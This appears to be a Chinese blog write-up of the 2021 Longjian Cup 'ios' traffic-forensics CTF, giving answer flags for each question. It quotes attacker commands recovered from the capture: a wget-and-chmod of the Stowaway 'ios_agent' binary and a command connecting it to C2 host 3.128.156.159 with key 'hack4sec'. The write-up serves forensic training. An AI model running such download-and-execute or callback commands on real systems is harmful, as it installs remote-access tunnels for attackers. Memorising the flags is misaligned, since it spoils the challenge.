首页 > 其他分享 >[陇剑杯 2021]ios流量分析

[陇剑杯 2021]ios流量分析

时间:2024-11-17 18:19:31浏览次数:3  
标签:陇剑杯 ios flag 2021 日志 NSSCTF

[陇剑杯 2021]ios(问1)

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币若干,请你通过流量和日志分析后作答:黑客所控制的C&C服务器IP是********_。得到的flag请使用NSSCTF{}格式提交。

首先过滤http的流量,这边依次点击,进行排查黑客上传了那些文件

后面发现上传了一个ios_agent后门文件

并发现上传的服务器IP

NSSCTF{3.128.156.159}

[陇剑杯 2021]ios(问2)

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币若干,请你通过流量和日志分析后作答:黑客利用的Github开源项目的名字是**__**。(如有字母请全部使用小写)。得到的flag请使用NSSCTF{}格式提交。

这段命令是用于从 GitHub 下载一个名为 <font style="color:rgb(122, 122, 122);">ios_agent</font> 的文件并赋予它可执行权限。

wget https://github.com/ph4ntonn/Stowaway/releases/download/1.6.2/ios_agent && chmod 755 ios_agent

主站+用户名+项目名称+项目资源

所以flag就是

NSSCTF{stowaway}

[陇剑杯 2021]ios(问3)

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币若干,请你通过流量和日志分析后作答:通讯加密密钥的明文是********。得到的flag请使用NSSCTF{}格式提交。

./ios_agent -c 3.128.156.159:8081 -s hack4sec

分析:

运行ios_agent这个程序在3.128.156.159:8081这个端口下-s hack4sec 就是密钥明文

NSSCTF{hack4sec}

[陇剑杯 2021]ios(问4)

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币若干,请你通过流量和日志分析后作答:黑客通过SQL盲注拿到了一个敏感数据,内容是********。得到的flag请使用NSSCTF{}格式提交。

因为有些流量的信息是加密的所以要进行解密,这边下载有一个keylog的文件,猜测是TLS解密

给它导入进行解密

打开首先项,再打开Protocols进行TLS解密,应用就行了

筛选http2这个协议,并搜索关键词select

再导出为CVS格式

再写一个提取脚本

import csv
import urllib.parse

# 打开CSV文件
with open('CTF解密脚本/111.csv', newline='', encoding='utf-8') as csvfile:
    reader = csv.reader(csvfile)
    # 打开22.txt文件用于写入
    with open('22.txt', 'w', encoding='utf-8') as txtfile:
        for row in reader:
            # 查找包含SQL盲注的语句
            for item in row:
                if 'select_hex' in item:
                    # URL解码
                    decoded_sql = urllib.parse.unquote(item)
                    
                    # 写入到22.txt文件
                    txtfile.write(decoded_sql + '\n')

再进提取成功的注入的值

import re

# 读取数据
with open('22.txt', 'r') as file:
    lines = file.readlines()

output_str = ''  # 存储最终字符串

# 遍历数据
for i in range(1, len(lines)):  # 从第二行开始
    current_line = lines[i]
    previous_line = lines[i-1]

    # 过滤数据
    if re.search(r'from_user\)="2B', current_line):
        # 使用正则表达式提取内容
        match = re.search(r'from_user\)="(.*)"', previous_line)
        if match:
            output_str += match.group(1) + ' '

# 输出结果
print(output_str)

去掉后面的zzz就是答案

NSSCTF{746558f3-c841-456b-85d7-d6c0f2edabb2}

[陇剑杯 2021]ios(问5)

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币若干,请你通过流量和日志分析后作答:黑客端口扫描的扫描器的扫描范围是********。(格式使用“开始端口-结束端口”,例如1-65535)。得到的flag请使用NSSCTF{}格式提交。

一般扫描是TCP进行筛选一下,再点击专家信息筛选RST

_高亮选中的一行显示了一个 TCP 连接的建立过程中的警告信息 “Connection reset (RST)”。_这个 RST (Reset) 标志位通常表示 TCP 连接被异常终止或重置。在正常的 TCP 连接关闭过程中,双方会发送带有 FIN 标志的数据包来优雅地关闭连接。而 RST 标志则用于非正常或意外的连接中断

NSSCTF{10-499}

[陇剑杯 2021]ios(问6)

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币若干,请你通过流量和日志分析后作答:被害者手机上被拿走了的私钥文件内容是********。得到的flag请使用NSSCTF{}格式提交。

有问题

[陇剑杯 2021]ios(问7)

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币若干,请你通过流量和日志分析后作答:黑客访问/攻击了内网的几个服务器,IP地址为********。(多个IP之间按从小到大排序,使用#来分隔,例如127.0.0.1#192.168.0.1)。得到的flag请使用NSSCTF{}格式提交。

更具日志文件分析,还有流量的端点统计,再已知内网 192 |172 进行筛选

这个最大,说明是攻击者的

根据前面的盲注,被攻击的ip是192.168.1.12

日志文件:

NSSCTF{172.28.0.2#192.168.1.12}

总结

有点难,但问题不大

标签:陇剑杯,ios,flag,2021,日志,NSSCTF
From: https://blog.csdn.net/Zx244349115/article/details/143836060

相关文章

  • NOIP2021 做题笔记
    这次又被抓过去写noip2021了\(qaq\)P7960[NOIP2021]报数可以用类似于质数筛的方法筛一遍,做到\(\mathcalO(\)值域\()\)的预处理,以及\(\mathcalO(1)\)的查询。#include<bits/stdc++.h>usingnamespacestd;#definelllonglong#definemxn10000010#definemxm200......
  • 使用 Axios 拦截器优化 HTTP 请求与响应的实践
    目录前言1.Axios简介与拦截器概念1.1Axios的特点1.2什么是拦截器2.请求拦截器的应用与实践2.1请求拦截器的作用2.2请求拦截器实现3.响应拦截器的应用与实践3.1响应拦截器的作用3.2响应拦截器实现4.综合实例:一个完整的Axios配置5.使用拦截器的好处与注......
  • 2021陇剑杯-内存取证
    陇剑杯2021内存分析(问1)网管小王制作了一个虚拟机文件,让您来分析后作答:虚拟机的密码是_____________。(密码中为flag{xxxx},含有空格,提交时不要去掉)。mimikatz一把梭了flag{W31C0M3T0THiS34SYF0R3NSiCX}内存分析(问2)网管小王制作了一个虚拟机文件,让您来分析后作答:虚......
  • 2021 Hubei Provincial Collegiate Programming Contest E. Revue
    题目描述n个人,每个人的初始分数不同(具体分数未知)有m次已知的Revue(按顺序发生),每次Revue形式为(x,y),意为x打败y,之后x的分变成二者max,y变成min现在你要按顺序在最后加入w次Revue,要保证在所有m+w次Revue中删掉任意k(k给出)次Revue后的所有初始分数的可能中,1都能获得最大分值最小......
  • 2021 Hubei Provincial Collegiate Programming Contest/2021湖北省赛 题解
    按解决顺序排列目录FAIDHECKJGBF二分答案ans,放最小的前ans个bi(变成必须放完)因为bi=2^k,所以小的放了可能会拆散大的空间,大的把小的地方占了的话小的可以塞其他地方,所以先放大的然后暴力能放则放,最多log次指针回到开头所以一次求解O(nlogn),总复杂度log^2A模拟,暴力枚举暴力异......
  • axios的post请求,数据为什么要用qs处理?什么时候不用?
    在使用Axios进行HTTP请求时,特别是在进行POST请求时,是否需要对数据进行qs(Querystring)处理主要取决于后端API接收数据的格式(Content-Type)以及你的具体需求。为什么有时需要用qs处理数据?后端期望application/x-www-form-urlencoded格式的数据:如果后端API设计为接收application/......
  • 音视频基础能力之 iOS 视频篇(一):视频采集
    涉及硬件的音视频能力,比如采集、渲染、硬件编码、硬件解码,通常是与客户端操作系统强相关的,就算是跨平台的多媒体框架也必须使用平台原生语言的模块来支持这些功能本系列文章将详细讲述移动端音视频的采集、渲染、硬件编码、硬件解码这些涉及硬件的能力该如何实现本文为该系......
  • HarmonyOS和OpenHarmony区别是什么?鸿蒙和安卓IOS的区别是什么?
    HarmonyOS和OpenHarmony的区别简单来说:OpenHarmony开源鸿蒙-系统底座设备开发(硬件方面)应用开发(软件方面)HarmonyOS华为鸿蒙-在系统底座的基础上,添加华为各种服务:如华为登录、华为地图、华为分享、华为推送等...OpenHarmony(开源鸿蒙):它侧重于作为系统底座发挥作用......
  • Android15音频进阶之input调节CarAudioService音量过程(九十四)
    简介:CSDN博客专家、《Android系统多媒体进阶实战》一书作者新书发布:《Android系统多媒体进阶实战》......
  • Axios 拦截器示例(JWT 登录与自动刷新)
    1.安装axios首先,确保你已经安装了axios:npminstallaxios2.设置Axios拦截器importaxiosfrom'axios';//创建一个axios实例constaxiosInstance=axios.create({baseURL:'http://localhost:8000/',//后端API地址timeout:10000,//设置超时时间......